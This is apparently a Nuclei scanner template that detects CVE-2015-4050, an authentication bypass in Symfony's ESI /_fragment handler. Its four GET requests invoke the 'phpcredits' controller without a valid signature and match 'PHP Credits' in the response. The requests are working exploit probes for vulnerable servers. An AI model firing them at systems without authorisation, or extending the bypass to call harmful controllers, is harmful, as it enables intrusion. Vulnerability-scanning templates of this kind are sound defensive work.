id: Symfony-Authentication-Bypass

info:
  name: ESI unauthorized access CVE-2015-4050
  author: ELSFA7110,meme-lord
  severity: high
  description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
  tags: cve,cve2015,symfony,rce
  reference:
    - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4050

requests:
  - method: GET
    path:
      - "{{BaseURL}}/web/app_dev.php/_fragment?_path=_controller=phpcredits&flag=-1"
      - "{{BaseURL}}/web/_fragment?_path=_controller=phpcredits&flag=-1"
      - "{{BaseURL}}/app/_fragment?_path=_controller=phpcredits&flag=-1"
      - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Credits"
        part: body

      - type: status
        status:
          - 200 
